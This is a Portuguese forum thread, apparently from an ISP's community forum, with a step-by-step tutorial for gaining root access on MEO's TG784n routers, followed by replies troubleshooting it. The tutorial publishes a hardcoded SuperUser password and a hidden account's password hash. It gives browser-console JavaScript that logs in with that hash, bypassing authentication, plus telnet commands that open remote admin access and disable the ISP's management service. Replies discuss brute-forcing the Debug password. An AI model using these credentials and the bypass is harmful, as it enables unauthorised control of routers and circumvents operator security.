Como restaurar acessos RootUser e permissões num router TG784n (10.2.1.L)


Reputação 3
Crachá +7
  • Dinamizador Sénior
  • 109 respostas
Nota geral sobre o tópico


Este tutorial já não se aplica ao último firmware 10.2.1.L ou posterior.


Lamentávelmente foram adicionadas restrições que inviablizam o processo.


 


Finalmente temos forma de dar a volta às restrições aplicadas no último firmware deste router e restaurar as permissões e acesso RootUser. No seguimento da tentativa falhada anterior: http://forum.meo.pt/t5/Equipamentos-Internet/Como-criar-um-RootUser-para-aceder-a-telnet-no-firmware-10-2-1-D/m-p/67020/highlight/true#M14955 venho agora complementar com informação definitiva e testada.


 


NOTA: Estas instruções são dedicadas aos routers Thomson TG784n e Technicolor TG784n v3 (10.2.1.L) da MEO.


Poderá ser útil para outras versões.


 


 


/! IMPORTANTE /!


A MEO atualizou recentemente as permissões dos routers para não permitir os primeiros comandos da Parte 2, que darão o seguinte erro: command not allowed. Para contornar isto, será necessário fazer um reset ao router e desligá-lo da internet. Agradecimentos ao utilizador ? (ver aqui) por ter confirmado a possibilidade de, apesar desta alteração, ser possível completar o processo.


 


 


Parte 0.


Vais ter que desligar o router da internet e fazer um reset para voltar às predefinições de fábrica.


NOTA: Como deves saber, fazer um reset ao router fará com que percas todas as definições do mesmo, incluíndo login da ligação Internet e, principalmente, configurações VoIP (caso o teu telefone fixo esteja configurado no router dessa forma). 


 


 


Parte 1.


Aceder ao router através de Telnet e usar o seguinte acesso de SuperUser:


code:
Username: sumeo
Password: bfd,10ng

 


 


Parte 2.
Criar e ativar o acesso remoto com os seguintes comandos:


code:
:system ra instadd name=remoteaccess
:system ra config name=remoteaccess state=enabled secure=disabled port=1234 timeout=0 mode=Permanent ipintf=InternetGPON randompassword=enabled randomport=disabled group=Users.Group.RootUser user=Users.User.Debug systemservice=webservice

 NOTA: Isto irá alterar definitivamente a palavra-passe do utilizador Debug, mas não há problema. Obrigado ao ? pela dica do ipintf=InternetGPON


 


 


 Depois, apenas para confirmar, verificar se o acesso remoto foi ativado devidamente, com o seguinte comando:


code:
:system ra list

 


Deverás obter o seguinte resultado:


code:
Remote assistance configuration
---------------------------------------------------------------------
Name : remoteaccess
State : enabled
Remote assistance port : 1234
Secure remote assistance : disabled
Timeout : 0 minutes
Mode : Permanent
IP interface :
Random password : 1
Random port : 0
Group : Users.Group.RootUser
User : Users.User.Debug
Tod schedule :
SystemService : webservice

NOTA: As definições importantes são 'State' que deverá ser 'enabled', 'Remote assistance port' que terás que saber para te poderes ligar ao router ('1234' neste exemplo), e o valor de 'Random password' que deverá ser '1' (enabled).


 


 


Parte 2.1.


Para podermos proceder ao passo seguinte (Parte 3), terás que ligar o router à internet para poder aceder remotamente ao mesmo. Mas uma vez que a MEO definiu as novas restrições, que serão aplicadas após ligar à internet, vais ter que executar os passos da Parte 3 o mais rápido possível (entre 1 a 2 minutos). Antes de começares lê bem o que é necessário fazer e prepara antecipadamente tudo o que puderes, desde colocar o URL num separador, pronto para colar o IP, e colar o código de login do utilizador "nauser" na consola. Assim que tiveres ensaiado o processo, liga o router à internet e segue para a Parte 3 em modo turbo!


 



Parte 3.
Em primeiro lugar, terás que saber qual o endereço IP(v4) da tua ligação de internet, existem várias formas de o obteres.


Podes consultá-lo no próprio router através deste link: http://192.168.1.254/cgi/b/is/?be=0&l0=2&l1=2


Ou através de uma das várias páginas web, como por exemplo: http://www.whatismyip.com


Ou podes até usar o seguinte comando para isso:


code:
:ip iplist proto=ipv4

O endereço IPv4 da tua ligação de internet é o prefixo atribuído à interface 'Internet', do lado esquerdo da lista.


 


De seguida, utilizando uma segunda ligação à internet, que é obrigatória para que este método funcione, acede ao teu router remotamente através do navegador:


 


  • opção a) - Através de um proxy web, como este:
code:
http://proxy.piratenpartij.nl/TEU.ENDEREÇO.IP.INTERNET:1234/remote_admin.lp

 


  • opção b) - Através de uma ligação secundária:
code:
http://TEU.ENDEREÇO.IP.INTERNET:1234/remote_admin.lp

 NOTA: Se o acesso remoto tiver sido definido como secure, deverás usar HTTPS em vez de HTTP.


 


Se tudo tiver corrido bem, deverás ser redirecionado para a página de login do teu router.
Agora vamos usar o mesmo utilizador que a MEO usa para "brincar" com os routers e também recorrendo à já conhecida vulnerabilidade de login que, irónicamente, não se deram ao trabalho de corrigir (obrigado!).
Para aqueles que não estão familiarizados com o processo, abrir a consola do navegador (Ctrl+Shift+J no Chrome e Ctrl+Shift+K no Firefox) e cola o código abaixo, seguido da tecla 'Enter':


code:
var user = "nauser";
var hash2 = "d3eff9622e6e8efe7d8c059c596f075f";
var HA2 = MD5("GET" + ":" + uri);
document.getElementById("user").value = user;
document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce +":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);
document.authform.submit(); 


NOTA DE COMPATIBILIDADE (TG784n):
Se o router for o TG784n em vez do TG784n v3, então ignora o código acima e usa este para aceder ao router:


code:
var user = "nauser";
var hash2 = "f8700f3bb4e73cc4bb5229def20ce0d0";
var HA2 = MD5("GET" + ":" + uri);
document.getElementById("user").value = user;
document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce +":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);
document.authform.submit(); 

Se precisares de executar este código num dispositivo móvel, ou num navegador que não possua consola, vai à barra de endereço do navegador e limpa tudo, depois escreve o texto abaixo e cola o código acima, carregando depois na tecla 'Enter':

code:
javascript:

NOTA: Em vez de : escreve o símbolo de pontuação "dois pontos" [:], o fórum não me permite escrever tudo acima.

Deverá agora ser apresentada a página de acesso/assistência remota.


Estará também visível a palavra-passe aleatória que foi atribuída ao utilizador Debug, toma nota dessa palavra-passe uma vez que irá ser imprescindível no passo seguinte. De seguida clicar no botão 'Desativar Acesso Remoto', o router deixará de responder uma vez que irá terminar a ligação remota existente, não há problema já que este acesso remoto deixará de ser necessário.


 


NOTA IMPORTANTE: Se após introduzires o código de login não fores redirecionado para a página do acesso remoto, poderá querer dizer que não executaste os passos com rapidez suficiente e o router acabou por descarregar as alterações às permissões a partir do servidor da MEO. Nesse caso, infelizmente, terás que voltar a fazer um reset e a recomeçar do zero.


 



Parte 4.
Entrar no router localmente através de Telnet com o utilizador Debug e a palavra-passe aleatória que foi recuperada anteriormente na página de acesso/assistência remota. Após entrar, altera a palavra-passe do utilizador Debug para uma à tua escolha:


code:
:user config name=Debug password=NOVA_PASSWORD

 NOTA: Substituír NOVA_PASSWORD pela palavra-passe que pretendes.


 


De seguida, retira as restrições que foram aplicadas ao grupo RootUser, nomeadamente a possibilidade de entrar através de HTTP/HTTPS, com o seguinte comando:


code:
:mlp role addpriv name=RootUser access=AP1 service=anyservice

 


Como bónus, vais restaurar as permissões de acesso ao ficheiro user.ini de forma a poderes voltar a usar a função de cópia de segurança que permite guardar as definições do router:


code:
:mlp interaction config name=dl/user.ini type=cgi score=40000:0 score2=40000:0 recurse=disabled

 


Por fim, vais tornar estas alterações permanentes através do seguinte comando:


code:
saveall

 


 


Parte 5.


Caso queiras adicionar um novo RootUser, acede ao router através da página web com o utilizador Debug e vai até à página de criação de um novo utilizador:


code:
http://192.168.1.254/cgi/b/users/cfg/usraccaddrem/

 


Nessa página, preenche o nome de utilizador e palavra-passe (confirma a palavra-passe), depois abre a consola do navegador (Ctrl+Shift+J no Chrome e Ctrl+Shift+K no Firefox) e cola o código abaixo, seguido da tecla 'Enter':


code:
var Privilege = document.getElementsByName('31')[0]; 
Privilege.options[0].value = 'RootUser';
Privilege.selectedIndex = 0;
submitForm(document.usrAccDef,10,1,"usrAccApply","",0,""); 

Se precisares de executar este código num dispositivo móvel, ou num navegador que não possua consola, vai à barra de endereço do navegador e limpa tudo, depois escreve o texto abaixo e cola o código acima, carregando depois na tecla 'Enter':

code:
javascript:

NOTA: Em vez de : escreve o símbolo de pontuação "dois pontos" [:], o fórum não me permite escrever tudo acima.

 


Está feito, já deverás ser capaz de entrar com qualquer utilizador RootUser através da página web e também fazer cópia de segurança das definições do router, como nos firmwares das versões anteriores. 


 


Bonús.


É aconselhável desativar o serviço CWMP para evitar surpresas da MEO:


code:
:cwmp config state=disabled
:service system modify name=CWMP-S state=disabled
:service system modify name=CWMP-C state=disabled
saveall

 


Se fores mesmo anti-surpresas, podes também alterar a palavra-passe do utilizador "nauser":


code:
:system ra config name=remoteaccess state=enabled secure=disabled port=1234 timeout=0 mode=Permanent randompassword=enabled randomport=disabled group=Users.Group.NA user=Users.User.nauser systemservice=webservice
:system ra instdelete name=remoteaccess
saveall

 


Novo lema: Porque o router é Meo, mas quem manda sou eo! :p


 


 


Deixo um grande abraço para Alex Kemp, administrador do fórum www.modem-help.co.uk, que fechou hoje as portas após 10 anos online e que contribuiu imenso na disseminação de informação associada a estes equipamentos de rede.Thanks for everything, Alex! 😃

Tópico fechado, já não permite mais respostas.

300 respostas

Reputação 6
Crachá +10
ner0 escreveu:

 


Efetivamente, se tiveres seguido o tutorial à risca, já terás desativado o acesso remoto com um simples clique e no preciso momento em que deixas de precisar do mesmo.



 


Sim, bem visto. Devido aos erros da consola, não estava seguro de que esse botão funcionasse correctamente e ignorei por completo. De qualquer forma, ficou o comando alternativo por telnet, para quem o preferir. Obrigado.


 


Atentamente,
Boa tarde,


 


Muito obrigado @@ner0


Informo que 


code:
:user config name=Debug password=NOVA_PASSWORD
saveall

funcionou na perfeição.


 


VaF
VaF escreveu:

Como se pode ver na página 4 deste tutorial

Tekhouls escreveu:

Nota, a este manual:


 


NOTA DE COMPATIBILIDADE (TG784n):
Se o router for o TG784n em vez do TG784n v3, então ignora o código acima e usa este para aceder ao router:


code:
var user = "nauser";
var hash2 = "f8700f3bb4e73cc4bb5229def20ce0d0";
var HA2 = MD5("GET" + ":" + uri);
document.getElementById("user").value = user;
document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce +":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);
document.authform.submit(); 

 Tambem é compativel com o TG799vn.


 


Muito obrigado pelo manual.



 





Testei no meu TG799vn e não deu, simplesmente não faz nada nem login nem erro, alguem sabe o código para fazer login num TG799vn ver. 10.2.1.L?

Sabem dizer se esta solução também funciona num TG799vn ver. 10.2.1.L?
Reputação 3
Crachá +7

Provavelmente estás a tentar fazer login através da rede local, por isso não acontece nada nem dá erro.


O utilizador 'nauser' costuma ser "universal", e o membro que citaste confirmou que funciona para esse modelo.


Confirma se estás a seguir o tutorial à risca.


 


Na parte da ligação remota aconselho-te a optares pela opção a)


 


  • opção a) - Através de um proxy web, como este:
code:
http://proxy.piratenpartij.nl/TEU.ENDEREÇO.IP.INTERNET:1234/remote_admin.lp

 


Sim tentei através da LAN, pensei que o acesso remoto fosse uma opção e não um imperativo...

É ridiculo fazer toda aquela volta do acesso remoto se na realidade está logo ali.

Vou fazer os passos todos e depois confirmo se deu.


Obrigado pela atenção ner0
Reputação 2
Ao executar o primeiro comando: system ra instadd name=remoteaccess dá-me command not allowed.


 


Não há como resolver?
Reputação 3
Crachá +7
fL0 escreveu:

Ao executar o primeiro comando: system ra instadd name=remoteaccess dá-me command not allowed.


 


Não há como resolver?



Para já penso que não, a MEO corrigiu a falha de segurança com uma atualização.
Reputação 2
MEO no seu melhor... é que o user sumeo é completamente ignorado lol "SuperUser"


 


Qualquer que seja o comando executado dá sempre not allowed.


 


Estive a ver se conseguia aceder via ftp mas tá doce.
Não da para fazer um downgrade algo do genero para conseguir desativar? :@


 
Reputação 3
Crachá +7
Teoricamente, sim.
Uma das possibilidades é através do seguinte comando:


code:
:software switchover

Deverá ser possível reverter à versão do FW anterior, caso o utilizador tenha permissões para executar o comando acima.


 


Antes disso, convém confirmar se a versão passiva também é L (devido à migração para IPoE), através do seguinte comando:


code:
:software version

 


A alternativa é encontrar um ficheiro do FW anterior e fazer o download/upload através do computador, em modo BOOT-P, com o seguinte comando:


code:
:software upgrade

Também neste último caso, apenas se o utilizador tiver permissões para executar o comando acima.


 


NOTA: Em qualquer caso, poderá resultar na perca das definições ou na avaria do aparelho se o processo for executado indevidamente.
Crachá +1
Alguem me pode ajudar? nao consigo excutar os comandos depois de fazer login por telnet, recebo sempre a mensagem "command not allowed"

 
Reputação 3
Crachá +7
Como já foi mencionado numa das respostas anteriores, a MEO propagou algumas alterações aos routers que estão a impedir o funcionamento deste método. Dito isto, desconfio que estas alterações não são permanentes - apesar de não ter a certeza do nível de volatilidade das mesmas. Se for feito um reset para definições de fábrica, o utilizador SuperUser (sumeo) deverá recuperar a capacidade de ativar o acesso remoto. Se quiseres tentar, deverás fazer um reset ao router e voltar a tentar seguir o tutorial.


 


NOTA: Como deves saber, fazer um reset ao router fará com que percas todas as definições do mesmo, incluíndo login da ligação Internet e, principalmente, configurações VoIP (caso o teu telefone fixo esteja configurado no router dessa forma). Se mesmo assim quiseres fazê-lo, inicialmente é aconselhável seguir o tutorial sem ligação à internet para que não corram os riscos de voltar a perder as permissões prematuramente. Caso consigam criar um novo RootUser, aconselho a desativarem o serviço CWMP através dos seguintes comandos:


 


code:
:cwmp config state=disabled
:service system modify name=CWMP-S state=disabled
:service system modify name=CWMP-C state=disabled
saveall

 


 


Ao contrário daquilo que pensava inicialmente, a atualização feita às permissões, que tornam este tutorial (quase) inútil, não foi uma atualização do firmware. Parece que utilizaram o servidor ACS para alterar as permissões em todos os routers, independentemente da versão de FW - visto que não só afeta a versão 10.2.1.L mas também a 10.2.1.D.


 


Aa duas alterações mais inconvenientes foram:


- Restringir o SuperUser ao nível dum mero "Administrator", agora um "SuperUser" tem praticamente as mesmas permissões que o utilizador "meo" ou "Administrador";


- Desabilitar a possibilidade de login remoto por HTTP por parte do utilizador "nauser".


 
Crachá +1
Com o reset ja consigo correr os comandos o problema é quando ligo o router a net para poder aceder remotamente, perco os acessos novamente


 


Edit: quando faço o list aparce que o acesso remoto esta activo mas nao consigo aceder depois de ligar a net, e a seguir nem que queira ver se ainda continua a activo ja me da command not allowed


 
A hash das passwords, incluido a do Debug, têm ou não têm salt?
Aqui ? http://forum.meo.pt/t5/Tutoriais/Como-criar-um-RootUser-para-aceder-a-telnet-no-firmware-10-2-1-D/m-p/66460/highlight/true#M1803
Dizes que a hash da para crackear mas não sabemos se é muito grande e se tem salt? A hash do TG784n vi que o PTSec descobriu que era md5($user:Thomson Gateway:$password) muito mais que 8 caracteres. Confirmei que md5(sumeo:Thomson Gateway:bfd,10ng) = 094a55fcfbf4850f0f9eef4b5c1ff490, o que estava no .ini do meu antigo TG784n. Tentei ver se descobria o como era gerado o md5 do TG784n V3 (o meu)  de um superuser que tinha criado e não consegui. Continua a ser a "276da5030a939d29642637f279629770" a do TG784n V3 suponho.
Como descobrimos as outras passes btw? Alguém sabe? Suponho que para decobrir como é feito o md5 para o V3 tenha que andar a ver o ficheiro do firmware?

Quando tinha acesso com o firmware não tive interesse em criar um rootuser porque tentei uma vez e não consegui então fiquei me por criar um superuser visto que podia sempre usar o debug user quando quisesse... e agora já não da...

? tiveste sucesso em criar o root user apesar de depois perderes acesso a config do ra (remote acess) com o superuser(sumeo)?
? So para confirmar, se fizer reset como dizes consigo seguir o tutorial do 1º post? Ou seja passo a conseguir configurar o remote acess com superuser?
Queria so confirmar antes que perca as minhas settings, a mais importante, o randomports=disabled no nat.ini, é essencial para conseguir jogar online na wii u. Ou será k o valor default já é disabled? Se alguém poder confirmar ficarei agradecido.
Apenas uma sugestão... não seria prudente deixar esta discussão para outros fóruns/blogs/...? Isto de colocar instruções facilitadas a qualquer utilizador para adicionar um RootUser num fórum oficial... sinceramente nunca me pareceu uma boa ideia... é estar a "enfiar os dedos nos olhos" de alguém na própria casa desse alguém 😃 Até pela grande visibilidade (por clientes) que isto terá por aqui, inclusive por utilizadores que não precisam de facto do RootUser e que podem criar problemas desnecessários, etc... faz com que rapidamente alguém se mexa para bloquear os "buracos" que vão sendo descobertos... qualquer dia está tudo "tapado" de vez e vamos perdendendo cada vez mais funcionalidades que vão sendo desactivadas para "tapar buracos".


 


Espero não ser mal interpretado, é apenas a minha opinião, para bem de todos nós.


 
A minha opinião não vale muito porque so li umas vezes este forum mas acho que a discussão ser secreta não faz sentido porque seria necessário ser um circulo muito fechado. Isto é, temos que saber se cada um que seria informado é da meo ou não, dificil estar a verificar toda a gente, logo poucas pessoas usufruirem do exploit. Os que trabalham para tapar isto terão mais interesse em saber que alguns de nos so para  fazer umas modificaçõeszitas no router, logo acho que seria muito dificil partilhar essa informação sem passar pela meo. Os que percebem devem decidir entre guardar um exploit que pode ser corrigido em poucas semanas num update ou revelar para o publico e partilhar para entretanto as pessoas usufruirem.


 


tl;dr Mesmo se discutissemos noutro forum eles teriam tanto acesso como nos porque em principio têm mais interesse que um user qualquer.

Um bocado offtopic mas algém percebe o que a meo ganha em bloquear o acesso? Não vejo de que maneira incomoda, está alguma coisa no .ini que eles não querem que nos vejamos porque de qualquer maneira causa prejuizo?
Atenção que eu não sugeri que a discussão sobre o assunto fosse secreta/fechada, apenas acho que este não é o sitio certo para ela... não porque quem trabalha para tapar isto não possa ver noutro fórum/blog/etc... claro que poderia... mas terá certamente uma visibilidade bem menor para clientes e talvez não sintam tanta necessidade/urgência em tapar... ou mesmo de andar pela net à procura... é apenas uma ideia.
Reputação 3
Crachá +7
Fredgido escreveu:

A hash das passwords, incluido a do Debug, têm ou não têm salt?
Aqui @tiagofcp tiveste sucesso em criar o root user apesar de depois perderes acesso a config do ra (remote acess) com o superuser(sumeo)?
@ner0 So para confirmar, se fizer reset como dizes consigo seguir o tutorial do 1º post? Ou seja passo a conseguir configurar o remote acess com superuser?
Queria so confirmar antes que perca as minhas settings, a mais importante, o randomports=disabled no nat.ini, é essencial para conseguir jogar online na wii u. Ou será k o valor default já é disabled? Se alguém poder confirmar ficarei agradecido.



 


? A palavra-passe do Debug será mais comprida que 8 caracteres, o tempo de brute-force aumenta exponêncialmente.


Nestes routers o salt é praticamente o mesmo, Technicolor Gateway em vez de Thomson Gateway, o resto do hashing é idêntico.


Suponho que as passwords anteriores tenham sido crackadas dado que o comprimento da maior delas (sumeo) é de 8 caracteres o que é razoavelmente "crackavel" através de brute-force, ou então terão sido divulgadas por funcionários da MEO com conhecimento das mesmas.


 


Aquilo que eu adientei, e que o ? confirmou, foi que, de facto, as restrições são aplicadas via servidor ACS.


O que isto significa é que a MEO, tal como outras operadoras (VF), tem um servidor (acs.iptv.telecom.pt) onde são alojadas definições complementares para os routers. Assim que o teu router se liga à internet, este descarrega as definições e aplica as restrições.


Eu próprio não fiz os testes, mas o relato do nosso amigo é que este tutorial funciona até à Parte 2 (inclusive). O problema é que no momento de te ligares remotamente precisas de ligar o router à internet e assim que o fazes o router descarrega as atualizações que restringem o acesso do "nauser", impedindo-te de conseguires fazer o login remoto mesmo que ele ainda esteja ativo.


Surgem várias ideias de como ultrapassar este problema, mas teria que testá-las e fazer vários resets, algo que não deverá ser para breve. Em relação à questão sobre o randomports, não consigo confirmar, apesar de que uma breve pesquisa no Google indica que por defeito essa definição estará ativ, ou seja, randomports=enabled por defeito.


Já sobre o que motiva os engenheiros da MEO a bloquearem os acessos cada vez, existem várias razões plausivéis, entre elas:


- Impedir desbloqueio do equipamento a qualquer operadora;


- Impedir descobrir as credenciais VoIP;


- Impedir desativação unilateral do MEO-WiFi;


- Impedir manipulação do ficheiro de configurações (user.ini);


- Proteger os routers de ataques cibernéticos;


- Meter nojo.


 


? É uma questão interessante, e é possível que exista alguma verdade no que dizes, mas não me parece que faça muita diferença.


O "exploit" do utilizador Debug já era conhecido há vários anos e dúvido que não fosse do pleno conhecimento dos engenheiros da MEO, tanto que incluíram a restrição do login numa atualização de F/W. Se o simples facto desta informação constar do fórum da MEO é que os motiva a bloquear ainda mais o router, então a única razão plausível para isso é mesmo a última que listei no parágrafo anterior.


 


Em suma, a MEO pode bloquear aquilo que bem entender porque o router é deles... ou pelo menos é nisso que eles acreditam.


Só que afinal não, o router da MEO não é o Vaticano; mi casa no es tu casa.


 
Reputação 6
Crachá +10
ner0 escreveu:

 Se o simples facto desta informação constar do fórum da MEO é que os motiva a bloquear ainda mais o router, então a única razão plausível para isso é mesmo a última que listei no parágrafo anterior.

 


Em suma, a MEO pode bloquear aquilo que bem entender porque o router é deles... ou pelo menos é nisso que eles acreditam.


Só que afinal não, o router da MEO não é o Vaticano; mi casa no es tu casa.


 



 


? , ? , ? e outros...


 


A questão fulcral aqui, é que ao preocupar-se em demasia com a "abelhudice", corre-se o risco de servir mal alguns clientes, e não é fácil encontrar um meio termo, neste âmbito (acessos e restrições dos equipamentos). Obviamente que esse pessoal é instruído, desde cedo, sobretudo para aniquilar qualquer hipótese de um cliente se tornar "abelhudo", após se ter sentido mal servido. Isto deriva tudo de politicas das operadoras e, da forma como se aplicam essas mesmas politicas. O cliente supostamente assina um contrato e concorda com essas politicas, contrato em que a operadora assume claramente um ponto de vista linear e superficial, em relação ao propósito final dos seus produtos (por necessidade?) e, quase sempre a inevitável e fraca presunção de que todos os clientes são o típico andróide frenético da sociedade digital, e se estão borrifando para detalhes como portas de entrada exclusivas, pools de IP dinâmicas, gestão de hosts DNS, ACL por MAC em Wi-fi, etc... Detalhes que, teoricamente, afectam não mais que a forma como a rede de área local funciona, no nosso ambiente doméstico e, cuja manipulação inócua e moderada, revela-se bastante útil para alguns de nós. Se algo mudará, futuramente, nessas politicas e a esse respeito, não me parece. Até porque somos uma "minoria" e, a operadora (para se salvaguardar?) "entende" que esses detalhes terão sempre, obrigatoriamente, de passar pelo "filtro" das mãos, dos seus técnicos honorários, mas fica a ideia (se realmente, alguém de direito, estiver a dar importância a este tópico, o que não creio)...


 


Quanto ao problema das actualizações ao router, que muito me desilude o facto de as terem tornado constantes - algo que resulta claramente dum patch incluído no boot script do 10.2.1.L, fora do alcançe do user.ini e, aparentemente, activado silenciosamente através do comando "set var=STS_Security_Fix value=Enabled", acrescentado às variáveis de ambiente, nesse feed update - e que, felizmente, para mim foi indiferente, pois já me tinha adiantado na criação do rootuser no TG784n V3, penso que é facilmente ultrapassado usando um router adicional, ligado antes do router MEO e duas LAN distintas, ou então criando uma VPN local, visto que a única condicionante para que este tutorial resulte se resume agora a obter acesso de uma rede exterior à qual o router MEO está incluido. No fim de criado o rootuser e removido o feed do update, resta ligar o router MEO de novo à WAN e reconfigurar o que falta.


 


É irónico e ridículo, pois a politica de uma operadora "impõe" o uso do equipamento exclusivo deles e, no entanto, derivado aos muitos inconvenientes que daí se provam, quase tudo neste forum nos aponta e aconselha para o uso de outro equipamento que não o deles. No fim, ninguém parece "viver" verdadeiramente mal com esta realidade...


 


Atentamente.
Reputação 3
Crachá +7
Concordo @@NeoPT, muito bem resumido.


 


Em relação à atualização das permissões, o F/W anterior (10.2.1.D) também foi afetado.


Não tenho ideia que tenha sido feito o que quer que seja de forma permanente, nem que esteja fora do alcance do user.ini - pelo menos parcialmente não. Os routers desde sempre que se ligam ao servidor ACS, mas é curioso porque nunca foi usado em circumstâncias como a do utilizador Debug (pré v10.2.1.L), nunca barraram o seu uso mais que divulgado e agora vieram bloquear este pequeno "truque".


 


O que propões para simular um login exterior (WAN) não deverá funcionar duma forma tão simples uma vez que a porta WAN (ou ethif5) estará à espera dum handshake PPPoE (ou IPoE). Uma VPN local também não resultaria uma vez que é local, ou seja, navega em qualquer uma das interfaces ethernet ou wifi mas nunca pela porta que é preciso: wan
Qualquer que seja a alternativa, complica bastante... mas continua a ser possível. Por exemplo, usando um 2º router para estabelecer a ligação à internet e alterando a resolução DNS do endereço acs.iptv.telecom.pt para qualquer outro bloco deverá impedir que o router aplique as restrições quando ligado à internet (via o primeiro router).


 


Em último recurso, penso que existe uma outra possibilidade (infalível e offline); mas mesmo assim requer condições específicas e hardware apropriado. Após fazer um reset ao router o utilizador sumeo reganha as permissões anteriores que permitem ativar o acesso remoto. A ativação do acesso remoto em si não é o que é interessante mas sim o facto desse comando também poder atribuír uma palavra-passe aleatória a qualquer utilizador (Debug?). Ainda mais interessante é o facto da palavra-passe aleatória ser sempre composta por 8 caracteres, e cuja combinação está limitada a letras minúsculas e números. Tendo em conta que o comprimento e composição são conhecidos, e que se encontra ao alcance de uma operação brute-force, deverá então obter-se o hash2 da palavra-passe aleatória do utilizador Debug e proceder-se a uma operação de brute-force sobre o mesmo. O tempo de recuperação da palavra-passe dependerá do hardware... com hardware razoável, entre 1 a 2 horas deverá ser suficiente. Depois é fazer login por telnet e blá, blá, blá. Isto é apenas uma ideia instantânea, nem sequer sei se o sumeo consegue fazer um dump à configuração após um reset, o que seria necessário para obter o hash MD5. Se alguém quiser testar fazer um reset ao router e um dump ao hash, posso "ceder" até 2 horas de computação do meu hardware para colocar a teoria em prática.
Ao usar isto para fazer login:


 


code:
var user = "nauser";
var hash2 = "d3eff9622e6e8efe7d8c059c596f075f";
var HA2 = MD5("GET" + ":" + uri);
document.getElementById("user").value = user;
document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce +":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);
document.authform.submit(); 

 


não aparece aquele erro a dizer que os dados estão incorretos, apenas um pequeno flash e fica ali no login mas ao efetuar de seguida um login com um outro utilizador dá para ver que foi realmente feito um login com o nauser.


 


http://i.imgur.com/oFh4FGu.png


 


Isto leva-me a crer que o problema está nas restrições que foram aplicadas ao acesso via HTTP para este grupo de utilizadores (mlp role). 
Reputação 3
Crachá +7
? Se leres a página anterior, verás que estão mencionadas algumas das alterações; entre as quais:


ner0 escreveu:

As duas alterações mais inconvenientes foram:


- Restringir o SuperUser ao nível dum mero "Administrator", agora um "SuperUser" tem praticamente as mesmas permissões que o utilizador "meo" ou "Administrador";


- Desabilitar a possibilidade de login remoto por HTTP por parte do utilizador "nauser".



 
Reputação 6
Crachá +10
ner0 escreveu:

 


...O que propões para simular um login exterior (WAN) não deverá funcionar duma forma tão simples uma vez que a porta WAN (ou ethif5) estará à espera dum handshake PPPoE (ou IPoE). Uma VPN local também não resultaria uma vez que é local, ou seja, navega em qualquer uma das interfaces ethernet ou wifi mas nunca pela porta que é preciso: wan...



Olá ?


 


Exacto, bem visto. Como o meu TG784n V3, já se conecta por IPoE descartei completamente essa hipotese. Teoricamente, seria possivel simular tambem um servidor PPPoE, num PC exterior ao router MEO, ou até mesmo reconfigurar as Interfaces do router MEO, fazendo o routing  necessário ao gateway. Mas estes procedimentos seriam bastante mais penosos e, depois há o "pequeno", grande pormenor de, até que o acesso rootuser não esteja livre, nada disto é viável... Bem, parece mesmo que não restam muitas alternativas.


 


Atentamente,
Olá,

 

Estou a tentar criar o acesso rootuser mas não consigo passar do passo 2.

 

Consigo criar o acesso através de telnet (telnet 192.168.1.254), introduzo o user name e password (sumeo) e quando digito o comando "system ra" dá-me a informação que o comando não é permitido (command is not allowed).

 

Os meus conhecimentos de informática a este nível são básicos e não consigo passar do passo 2.

 

Alguém consegue dar-me uma ajuda?

 

Já alguém configurou um WD mycloud através do router  TG784n v3?

 

Cumprimentos
Crachá +1
Se me derem ideias, eu posso tentar dar reset e ver se conseguimos uma solução para ter acesso remotamente ao router, ja tentei incluisve com outro router 4G a fornecer a net e com o da meo ligado a este mas nao conta como acesso exterior.


 


Alguem tem sugestões?